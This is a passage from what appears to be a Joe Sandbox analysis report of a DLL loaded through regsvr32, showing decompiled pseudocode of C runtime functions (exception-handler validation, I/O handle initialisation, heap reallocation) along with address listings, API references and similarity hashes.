				_t92 = _a4;
				_t69 =  *(_t92 + 8);
				if((_t69 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x18];
				_t51 = _a4;
				_t73 =  *((intOrPtr*)(_t51 + 8));
				_v8 = _t73;
				if(_t69 < _t73 || _t69 >=  *((intOrPtr*)(_t51 + 4))) {
					_t88 =  *((intOrPtr*)(_t92 + 0xc));
					__eflags = _t88 - 0xffffffff;
					if(_t88 != 0xffffffff) {
						_t81 = 0;
						__eflags = 0;
						_a4 = 0;
						_t52 = _t69;
						do {
							_t74 =  *_t52;
							__eflags = _t74 - 0xffffffff;
							if(_t74 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t74 - _t81;
							if(_t74 >= _t81) {
								L41:
								_t56 = 0;
								L57:
								return _t56;
							}
							L9:
							__eflags =  *(_t52 + 4);
							if( *(_t52 + 4) != 0) {
								_t13 =  &_a4;
								 *_t13 = _a4 + 1;
								__eflags =  *_t13;
							}
							_t81 = _t81 + 1;
							_t52 = _t52 + 0xc;
							__eflags = _t81 - _t88;
						} while (_t81 <= _t88);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t53 =  *0x1004f590; // 0x0
							_t91 = _t69 & 0xfffff000;
							_t93 = 0;
							__eflags = _t53;
							if(_t53 <= 0) {
								L18:
								_t55 = VirtualQuery(_t69,  &_v36, 0x1c);
								__eflags = _t55;
								if(_t55 == 0) {
									L56:
									_t56 = _t55 | 0xffffffff;
									__eflags = _t56;
									goto L57;
								}
								__eflags = _v36.Type - 0x1000000;
								if(_v36.Type != 0x1000000) {
									goto L56;
								}
								__eflags = _v36.Protect & 0x000000cc;
								if((_v36.Protect & 0x000000cc) == 0) {
									L28:
									_t57 = InterlockedExchange(0x1004f5d8, 1);
									__eflags = _t57;
									if(_t57 != 0) {
										goto L5;
									}
									_t75 =  *0x1004f590; // 0x0
									__eflags = _t75;
									_t82 = _t75;
									if(_t75 <= 0) {
										L33:
										__eflags = _t82;
										if(_t82 != 0) {
											L40:
											InterlockedExchange(0x1004f5d8, 0);
											goto L5;
										}
										_t70 = 0xf;
										__eflags = _t75 - _t70;
										if(_t75 <= _t70) {
											_t70 = _t75;
										}
										_t83 = 0;
										__eflags = _t70;
										if(_t70 < 0) {
											L38:
											__eflags = _t75 - 0x10;
											if(_t75 < 0x10) {
												_t76 = _t75 + 1;
												__eflags = _t76;
												 *0x1004f590 = _t76;
											}
											goto L40;
										} else {
											do {
												_t60 = 0x1004f598 + _t83 * 4;
												_t83 = _t83 + 1;
												__eflags = _t83 - _t70;
												 *_t60 = _t91;
												_t91 =  *_t60;
											} while (_t83 <= _t70);
											goto L38;
										}
									}
									_t61 = 0x1004f594 + _t75 * 4;
									while(1) {
										__eflags =  *_t61 - _t91;
										if( *_t61 == _t91) {
											goto L33;
										}
										_t82 = _t82 - 1;
										_t61 = _t61 - 4;
										__eflags = _t82;
										if(_t82 > 0) {
											continue;
										}
										goto L33;
									}
									goto L33;
								}
								_t77 = _v36.AllocationBase;
								__eflags =  *_t77 - 0x5a4d;
								if( *_t77 != 0x5a4d) {
									goto L56;
								}
								_t55 =  *((intOrPtr*)(_t77 + 0x3c)) + _t77;
								__eflags =  *_t55 - 0x4550;
								if( *_t55 != 0x4550) {
									goto L56;
								}
								__eflags =  *((short*)(_t55 + 0x18)) - 0x10b;
								if( *((short*)(_t55 + 0x18)) != 0x10b) {
									goto L56;
								}
								_t71 = _t69 - _t77;
								__eflags =  *((short*)(_t55 + 6));
								_t79 = ( *(_t55 + 0x14) & 0x0000ffff) + _t55 + 0x18;
								if( *((short*)(_t55 + 6)) <= 0) {
									goto L56;
								}
								_t63 =  *((intOrPtr*)(_t79 + 0xc));
								__eflags = _t71 - _t63;
								if(_t71 < _t63) {
									goto L28;
								}
								__eflags = _t71 -  *((intOrPtr*)(_t79 + 8)) + _t63;
								if(_t71 >=  *((intOrPtr*)(_t79 + 8)) + _t63) {
									goto L28;
								}
								__eflags =  *(_t79 + 0x27) & 0x00000080;
								if(( *(_t79 + 0x27) & 0x00000080) != 0) {
									goto L41;
								}
								goto L28;
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 + 1;
								__eflags = _t93 - _t53;
								if(_t93 < _t53) {
									continue;
								}
								goto L18;
							}
							__eflags = _t93;
							if(_t93 <= 0) {
								goto L5;
							}
							_t64 = InterlockedExchange(0x1004f5d8, 1);
							__eflags = _t64;
							if(_t64 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
							if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
								L53:
								_t80 = 0;
								__eflags = _t93;
								if(_t93 < 0) {
									L55:
									InterlockedExchange(0x1004f5d8, 0);
									goto L5;
								} else {
									goto L54;
								}
								do {
									L54:
									_t66 = 0x1004f598 + _t80 * 4;
									_t80 = _t80 + 1;
									__eflags = _t80 - _t93;
									 *_t66 = _t91;
									_t91 =  *_t66;
								} while (_t80 <= _t93);
								goto L55;
							}
							_t67 =  *0x1004f590; // 0x0
							_t43 = _t67 - 1; // -1
							_t93 = _t43;
							__eflags = _t93;
							if(_t93 < 0) {
								L49:
								__eflags = _t67 - 0x10;
								if(_t67 < 0x10) {
									_t67 = _t67 + 1;
									__eflags = _t67;
									 *0x1004f590 = _t67;
								}
								_t46 = _t67 - 1; // 0x0
								_t93 = _t46;
								goto L53;
							} else {
								goto L46;
							}
							while(1) {
								L46:
								__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 - 1;
								__eflags = _t93;
								if(_t93 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t93;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L55;
								}
								goto L53;
							}
							goto L49;
						}
						_t68 =  *((intOrPtr*)(_t92 - 8));
						__eflags = _t68 - _v8;
						if(_t68 < _v8) {
							goto L41;
						}
						__eflags = _t68 - _t92;
						if(_t68 >= _t92) {
							goto L41;
						}
						goto L15;
					}
					L5:
					_t56 = 1;
					goto L57;
				} else {
					goto L3;
				}
			}



































                                                                                                            0x10014699
                                                                                                            0x1001469c
                                                                                                            0x100146a2
                                                                                                            0x100146bf
                                                                                                            0x00000000
                                                                                                            0x100146bf
                                                                                                            0x100146aa
                                                                                                            0x100146ad
                                                                                                            0x100146b0
                                                                                                            0x100146b5
                                                                                                            0x100146b8
                                                                                                            0x100146c7
                                                                                                            0x100146ca
                                                                                                            0x100146cd
                                                                                                            0x100146d7
                                                                                                            0x100146d7
                                                                                                            0x100146d9
                                                                                                            0x100146dc
                                                                                                            0x100146de
                                                                                                            0x100146de
                                                                                                            0x100146e0
                                                                                                            0x100146e3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100146e5
                                                                                                            0x100146e7
                                                                                                            0x10014832
                                                                                                            0x10014832
                                                                                                            0x100148b5
                                                                                                            0x00000000
                                                                                                            0x100148b5
                                                                                                            0x100146ed
                                                                                                            0x100146ed
                                                                                                            0x100146f1
                                                                                                            0x100146f3
                                                                                                            0x100146f3
                                                                                                            0x100146f3
                                                                                                            0x100146f3
                                                                                                            0x100146f6
                                                                                                            0x100146f7
                                                                                                            0x100146fa
                                                                                                            0x100146fa
                                                                                                            0x100146fe
                                                                                                            0x10014702
                                                                                                            0x10014718
                                                                                                            0x10014718
                                                                                                            0x1001471f
                                                                                                            0x10014725
                                                                                                            0x10014727
                                                                                                            0x10014729
                                                                                                            0x1001473d
                                                                                                            0x10014744
                                                                                                            0x1001474a
                                                                                                            0x1001474c
                                                                                                            0x100148b2
                                                                                                            0x100148b2
                                                                                                            0x100148b2
                                                                                                            0x00000000
                                                                                                            0x100148b2
                                                                                                            0x10014752
                                                                                                            0x10014759
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001475f
                                                                                                            0x10014763
                                                                                                            0x100147bb
                                                                                                            0x100147c2
                                                                                                            0x100147c8
                                                                                                            0x100147ca
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100147d0
                                                                                                            0x100147d6
                                                                                                            0x100147d8
                                                                                                            0x100147da
                                                                                                            0x100147ef
                                                                                                            0x100147ef
                                                                                                            0x100147f1
                                                                                                            0x10014820
                                                                                                            0x10014827
                                                                                                            0x00000000
                                                                                                            0x10014827
                                                                                                            0x100147f5
                                                                                                            0x100147f6
                                                                                                            0x100147f8
                                                                                                            0x100147fa
                                                                                                            0x100147fa
                                                                                                            0x100147fc
                                                                                                            0x100147fe
                                                                                                            0x10014800
                                                                                                            0x10014814
                                                                                                            0x10014814
                                                                                                            0x10014817
                                                                                                            0x10014819
                                                                                                            0x10014819
                                                                                                            0x1001481a
                                                                                                            0x1001481a
                                                                                                            0x00000000
                                                                                                            0x10014802
                                                                                                            0x10014802
                                                                                                            0x10014802
                                                                                                            0x1001480b
                                                                                                            0x1001480c
                                                                                                            0x1001480e
                                                                                                            0x10014810
                                                                                                            0x10014810
                                                                                                            0x00000000
                                                                                                            0x10014802
                                                                                                            0x10014800
                                                                                                            0x100147dc
                                                                                                            0x100147e3
                                                                                                            0x100147e3
                                                                                                            0x100147e5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100147e7
                                                                                                            0x100147e8
                                                                                                            0x100147eb
                                                                                                            0x100147ed
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100147ed
                                                                                                            0x00000000
                                                                                                            0x100147e3
                                                                                                            0x10014765
                                                                                                            0x10014768
                                                                                                            0x1001476d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014776
                                                                                                            0x10014778
                                                                                                            0x1001477e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014784
                                                                                                            0x1001478a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014790
                                                                                                            0x10014792
                                                                                                            0x1001479b
                                                                                                            0x1001479f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100147a5
                                                                                                            0x100147a8
                                                                                                            0x100147aa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100147b1
                                                                                                            0x100147b3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100147b5
                                                                                                            0x100147b9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001472b
                                                                                                            0x1001472b
                                                                                                            0x1001472b
                                                                                                            0x10014732
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014738
                                                                                                            0x10014739
                                                                                                            0x1001473b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001473b
                                                                                                            0x10014836
                                                                                                            0x10014838
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001484b
                                                                                                            0x1001484d
                                                                                                            0x1001484f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014855
                                                                                                            0x1001485c
                                                                                                            0x1001488c
                                                                                                            0x1001488c
                                                                                                            0x1001488e
                                                                                                            0x10014890
                                                                                                            0x100148a4
                                                                                                            0x100148ab
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014892
                                                                                                            0x10014892
                                                                                                            0x10014892
                                                                                                            0x1001489b
                                                                                                            0x1001489c
                                                                                                            0x1001489e
                                                                                                            0x100148a0
                                                                                                            0x100148a0
                                                                                                            0x00000000
                                                                                                            0x10014892
                                                                                                            0x1001485e
                                                                                                            0x10014863
                                                                                                            0x10014863
                                                                                                            0x10014866
                                                                                                            0x10014868
                                                                                                            0x1001487a
                                                                                                            0x1001487a
                                                                                                            0x1001487d
                                                                                                            0x1001487f
                                                                                                            0x1001487f
                                                                                                            0x10014880
                                                                                                            0x10014880
                                                                                                            0x10014885
                                                                                                            0x10014885
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001486a
                                                                                                            0x1001486a
                                                                                                            0x1001486a
                                                                                                            0x10014871
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014873
                                                                                                            0x10014873
                                                                                                            0x10014874
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014874
                                                                                                            0x10014876
                                                                                                            0x10014878
                                                                                                            0x1001488a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001488a
                                                                                                            0x00000000
                                                                                                            0x10014878
                                                                                                            0x10014704
                                                                                                            0x10014707
                                                                                                            0x1001470a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014710
                                                                                                            0x10014712
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10014712
                                                                                                            0x100146cf
                                                                                                            0x100146d1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,10010A4D,?), ref: 10014744
                                                                                                            • InterlockedExchange.KERNEL32(1004F5D8,00000001), ref: 100147C2
                                                                                                            • InterlockedExchange.KERNEL32(1004F5D8,00000000), ref: 10014827
                                                                                                            • InterlockedExchange.KERNEL32(1004F5D8,00000001), ref: 1001484B
                                                                                                            • InterlockedExchange.KERNEL32(1004F5D8,00000000), ref: 100148AB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExchangeInterlocked$QueryVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2947987494-0
                                                                                                            • Opcode ID: e0cdc256bb3868d1c22fae3aa9a7aee7891c9c056f8b4b492ea42fcca8756dbb
                                                                                                            • Instruction ID: 9d228fb4bd3535bae3d62daabf15c01b9b2423e99f84aa7b143aff86640a32b5
                                                                                                            • Opcode Fuzzy Hash: e0cdc256bb3868d1c22fae3aa9a7aee7891c9c056f8b4b492ea42fcca8756dbb
                                                                                                            • Instruction Fuzzy Hash: 3851C130A00A928FE718CF18C8D8A6C73E1EB46795F678169DA45DF2B1EF70DCC18A45
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001614C Relevance: 7.7, APIs: 5, Instructions: 172COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E1001614C() {
				void* __ebp;
				signed int _t51;
				signed int _t55;
				long _t59;
				signed int _t61;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				void* _t69;
				signed int* _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed char _t89;
				signed int _t96;
				void* _t99;
				int _t101;
				void** _t103;
				void** _t105;
				signed int** _t106;
				intOrPtr* _t109;
				void* _t110;

				_t51 = E100107B6(0x480);
				if(_t51 != 0) {
					 *0x1004f920 = _t51;
					 *0x1004f90c = 0x20;
					_t1 = _t51 + 0x480; // 0x480
					_t84 = _t1;
					while(1) {
						__eflags = _t51 - _t84;
						if(_t51 >= _t84) {
							break;
						}
						 *_t51 =  *_t51 | 0xffffffff;
						 *(_t51 + 8) =  *(_t51 + 8) & 0x00000000;
						 *((char*)(_t51 + 4)) = 0;
						 *((char*)(_t51 + 5)) = 0xa;
						_t85 =  *0x1004f920; // 0x0
						_t51 = _t51 + 0x24;
						_t84 = _t85 + 0x480;
						__eflags = _t84;
					}
					GetStartupInfoA(_t110 + 0x14);
					__eflags =  *((short*)(_t110 + 0x46));
					if( *((short*)(_t110 + 0x46)) == 0) {
						L26:
						_t81 = 0;
						__eflags = 0;
						do {
							_t86 =  *0x1004f920; // 0x0
							_t103 = _t86 + (_t81 + _t81 * 8) * 4;
							__eflags =  *_t103 - 0xffffffff;
							if( *_t103 != 0xffffffff) {
								_t49 =  &(_t103[1]);
								 *_t49 = _t103[1] | 0x00000080;
								__eflags =  *_t49;
								goto L42;
							}
							__eflags = _t81;
							_t103[1] = 0x81;
							if(_t81 != 0) {
								asm("sbb eax, eax");
								_t59 =  ~(_t81 - 1) + 0xfffffff5;
								__eflags = _t59;
							} else {
								_t59 = 0xfffffff6;
							}
							_t99 = GetStdHandle(_t59);
							__eflags = _t99 - 0xffffffff;
							if(_t99 == 0xffffffff) {
								L40:
								_t103[1] = _t103[1] | 0x00000040;
							} else {
								_t61 = GetFileType(_t99);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L40;
								}
								_t62 = _t61 & 0x000000ff;
								__eflags = _t62 - 2;
								 *_t103 = _t99;
								if(__eflags != 0) {
									__eflags = _t62 - 3;
									if(__eflags == 0) {
										_t42 =  &(_t103[1]);
										 *_t42 = _t103[1] | 0x00000008;
										__eflags =  *_t42;
									}
								} else {
									_t103[1] = _t103[1] | 0x00000040;
								}
								_push(0xfa0);
								_push( &(_t103[3]));
								_t64 = E10019599(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									L30:
									_t55 = _t64 | 0xffffffff;
									L44:
									return _t55;
								} else {
									_t103[2] = _t103[2] + 1;
									goto L42;
								}
							}
							L42:
							_t81 = _t81 + 1;
							__eflags = _t81 - 3;
						} while (_t81 < 3);
						SetHandleCount( *0x1004f90c);
						_t55 = 0;
						__eflags = 0;
						goto L44;
					}
					_t65 =  *(_t110 + 0x48);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L26;
					}
					_t101 =  *_t65;
					_t109 = _t65 + 4;
					 *(_t110 + 0x10) = _t101 + _t109;
					__eflags = _t101 - 0x800;
					if(_t101 >= 0x800) {
						_t101 = 0x800;
					}
					__eflags =  *0x1004f90c - _t101; // 0x20
					if(__eflags >= 0) {
						L18:
						_t82 = 0;
						__eflags = _t101;
						if(_t101 <= 0) {
							goto L26;
						} else {
							goto L19;
						}
						do {
							L19:
							_t69 =  *( *(_t110 + 0x10));
							__eflags = _t69 - 0xffffffff;
							if(_t69 == 0xffffffff) {
								goto L25;
							}
							_t89 =  *_t109;
							__eflags = _t89 & 0x00000001;
							if((_t89 & 0x00000001) == 0) {
								goto L25;
							}
							__eflags = _t89 & 0x00000008;
							if(__eflags != 0) {
								L23:
								_t105 = 0x1004f920[_t82 >> 5] + ((_t82 & 0x0000001f) + (_t82 & 0x0000001f) * 8) * 4;
								 *_t105 =  *( *(_t110 + 0x10));
								_t105[1] =  *_t109;
								_push(0xfa0);
								_push( &(_t105[3]));
								_t64 = E10019599(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									goto L30;
								}
								_t31 =  &(_t105[2]);
								 *_t31 = _t105[2] + 1;
								__eflags =  *_t31;
								goto L25;
							}
							__eflags = GetFileType(_t69);
							if(__eflags == 0) {
								goto L25;
							}
							goto L23;
							L25:
							 *(_t110 + 0x10) =  &(( *(_t110 + 0x10))[1]);
							_t82 = _t82 + 1;
							_t109 = _t109 + 1;
							__eflags = _t82 - _t101;
						} while (_t82 < _t101);
						goto L26;
					} else {
						_t106 = 0x1004f924;
						while(1) {
							_t78 = E100107B6(0x480);
							__eflags = _t78;
							if(_t78 == 0) {
								break;
							}
							 *0x1004f90c =  *0x1004f90c + 0x20;
							 *_t106 = _t78;
							_t12 =  &(_t78[0x120]); // 0x480
							_t96 = _t12;
							while(1) {
								__eflags = _t78 - _t96;
								if(_t78 >= _t96) {
									break;
								}
								 *_t78 =  *_t78 | 0xffffffff;
								_t78[2] = _t78[2] & 0x00000000;
								_t78[1] = 0;
								_t78[1] = 0xa;
								_t78 =  &(_t78[9]);
								_t96 =  &(( *_t106)[0x120]);
								__eflags = _t96;
							}
							_t106 =  &(_t106[1]);
							__eflags =  *0x1004f90c - _t101; // 0x20
							if(__eflags < 0) {
								continue;
							}
							goto L18;
						}
						_t101 =  *0x1004f90c; // 0x20
						goto L18;
					}
				}
				return _t51 | 0xffffffff;
			}



























                                                                                                            0x10016156
                                                                                                            0x1001615e
                                                                                                            0x10016168
                                                                                                            0x1001616d
                                                                                                            0x10016177
                                                                                                            0x10016177
                                                                                                            0x1001619d
                                                                                                            0x1001619d
                                                                                                            0x1001619f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001617f
                                                                                                            0x10016182
                                                                                                            0x10016186
                                                                                                            0x1001618a
                                                                                                            0x1001618e
                                                                                                            0x10016194
                                                                                                            0x10016197
                                                                                                            0x10016197
                                                                                                            0x10016197
                                                                                                            0x100161a9
                                                                                                            0x100161af
                                                                                                            0x100161b5
                                                                                                            0x100162a4
                                                                                                            0x100162a4
                                                                                                            0x100162a4
                                                                                                            0x100162a6
                                                                                                            0x100162a6
                                                                                                            0x100162af
                                                                                                            0x100162b2
                                                                                                            0x100162b5
                                                                                                            0x10016326
                                                                                                            0x10016326
                                                                                                            0x10016326
                                                                                                            0x00000000
                                                                                                            0x10016326
                                                                                                            0x100162b7
                                                                                                            0x100162b9
                                                                                                            0x100162bd
                                                                                                            0x100162ce
                                                                                                            0x100162d0
                                                                                                            0x100162d0
                                                                                                            0x100162bf
                                                                                                            0x100162c1
                                                                                                            0x100162c1
                                                                                                            0x100162da
                                                                                                            0x100162dc
                                                                                                            0x100162df
                                                                                                            0x10016320
                                                                                                            0x10016320
                                                                                                            0x100162e1
                                                                                                            0x100162e2
                                                                                                            0x100162e8
                                                                                                            0x100162ea
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100162ec
                                                                                                            0x100162f1
                                                                                                            0x100162f4
                                                                                                            0x100162f6
                                                                                                            0x100162fe
                                                                                                            0x10016301
                                                                                                            0x10016303
                                                                                                            0x10016303
                                                                                                            0x10016303
                                                                                                            0x10016303
                                                                                                            0x100162f8
                                                                                                            0x100162f8
                                                                                                            0x100162f8
                                                                                                            0x1001630a
                                                                                                            0x1001630f
                                                                                                            0x10016310
                                                                                                            0x10016315
                                                                                                            0x10016319
                                                                                                            0x100162c4
                                                                                                            0x100162c4
                                                                                                            0x10016342
                                                                                                            0x00000000
                                                                                                            0x1001631b
                                                                                                            0x1001631b
                                                                                                            0x00000000
                                                                                                            0x1001631b
                                                                                                            0x10016319
                                                                                                            0x1001632a
                                                                                                            0x1001632a
                                                                                                            0x1001632b
                                                                                                            0x1001632b
                                                                                                            0x1001633a
                                                                                                            0x10016340
                                                                                                            0x10016340
                                                                                                            0x00000000
                                                                                                            0x10016340
                                                                                                            0x100161bb
                                                                                                            0x100161bf
                                                                                                            0x100161c1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100161c7
                                                                                                            0x100161c9
                                                                                                            0x100161cf
                                                                                                            0x100161d8
                                                                                                            0x100161da
                                                                                                            0x100161dc
                                                                                                            0x100161dc
                                                                                                            0x100161de
                                                                                                            0x100161e4
                                                                                                            0x10016234
                                                                                                            0x10016234
                                                                                                            0x10016236
                                                                                                            0x10016238
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001623a
                                                                                                            0x1001623a
                                                                                                            0x1001623e
                                                                                                            0x10016240
                                                                                                            0x10016243
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016245
                                                                                                            0x10016248
                                                                                                            0x1001624b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001624d
                                                                                                            0x10016250
                                                                                                            0x1001625d
                                                                                                            0x10016271
                                                                                                            0x1001627a
                                                                                                            0x1001627f
                                                                                                            0x10016285
                                                                                                            0x1001628a
                                                                                                            0x1001628b
                                                                                                            0x10016290
                                                                                                            0x10016294
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016296
                                                                                                            0x10016296
                                                                                                            0x10016296
                                                                                                            0x00000000
                                                                                                            0x10016296
                                                                                                            0x10016259
                                                                                                            0x1001625b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016299
                                                                                                            0x10016299
                                                                                                            0x1001629e
                                                                                                            0x1001629f
                                                                                                            0x100162a0
                                                                                                            0x100162a0
                                                                                                            0x00000000
                                                                                                            0x100161e6
                                                                                                            0x100161e6
                                                                                                            0x100161eb
                                                                                                            0x100161ec
                                                                                                            0x100161f1
                                                                                                            0x100161f4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100161f6
                                                                                                            0x100161fd
                                                                                                            0x100161ff
                                                                                                            0x100161ff
                                                                                                            0x1001621d
                                                                                                            0x1001621d
                                                                                                            0x1001621f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10016207
                                                                                                            0x1001620a
                                                                                                            0x1001620e
                                                                                                            0x10016212
                                                                                                            0x10016218
                                                                                                            0x1001621b
                                                                                                            0x1001621b
                                                                                                            0x1001621b
                                                                                                            0x10016221
                                                                                                            0x10016224
                                                                                                            0x1001622a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001622c
                                                                                                            0x1001622e
                                                                                                            0x00000000
                                                                                                            0x1001622e
                                                                                                            0x100161e4
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetStartupInfoA.KERNEL32(?), ref: 100161A9
                                                                                                            • GetFileType.KERNEL32(?), ref: 10016253
                                                                                                            • GetStdHandle.KERNEL32(-000000F6), ref: 100162D4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleInfoStartupType
                                                                                                            • String ID:
                                                                                                            • API String ID: 2461013171-0
                                                                                                            • Opcode ID: 2a11ebc9d7fb6060b117caf8eeb261201d5d861bf5ae3b3f6147b5d07e97c54e
                                                                                                            • Instruction ID: 1ab9cbaac9cb8a736ff2886ec947831f70add154915b3c09dc4dcc7ccc4cd674
                                                                                                            • Opcode Fuzzy Hash: 2a11ebc9d7fb6060b117caf8eeb261201d5d861bf5ae3b3f6147b5d07e97c54e
                                                                                                            • Instruction Fuzzy Hash: 6C51F4716057429FD710CF68CC887267BE0EB4A364F258A6DD5A5CF2E2D734E889CB01
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001234F Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 54%
                                                                                                            			E1001234F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t30;
				long _t31;
				long _t33;
				void* _t36;
				long _t38;
				long _t41;
				long _t42;
				long _t44;
				long _t46;
				void* _t59;
				long _t61;
				void* _t67;
				void* _t68;

				_push(0x14);
				_push(0x10041dc0);
				E10012514(__ebx, __edi, __esi);
				_t59 =  *(_t67 + 8);
				if(_t59 != 0) {
					_t61 =  *(_t67 + 0xc);
					__eflags = _t61;
					if(__eflags != 0) {
						__eflags =  *0x10050a64 - 3;
						if( *0x10050a64 != 3) {
							while(1) {
								_t28 = 0;
								__eflags = _t61 - 0xffffffe0;
								if(_t61 <= 0xffffffe0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t28 = HeapReAlloc( *0x10050a60, 0, _t59, _t61);
								}
								__eflags = _t28;
								if(_t28 != 0) {
									goto L37;
								}
								__eflags =  *0x1004f58c; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								_t30 = E10014676(_t61);
								__eflags = _t30;
								if(_t30 != 0) {
									continue;
								}
								goto L36;
							}
							goto L37;
						} else {
							goto L5;
						}
						do {
							L5:
							 *(_t67 - 0x1c) = 0;
							__eflags = _t61 - 0xffffffe0;
							if(_t61 > 0xffffffe0) {
								L25:
								_t28 =  *(_t67 - 0x1c);
								__eflags =  *(_t67 - 0x1c);
								if( *(_t67 - 0x1c) != 0) {
									goto L37;
								}
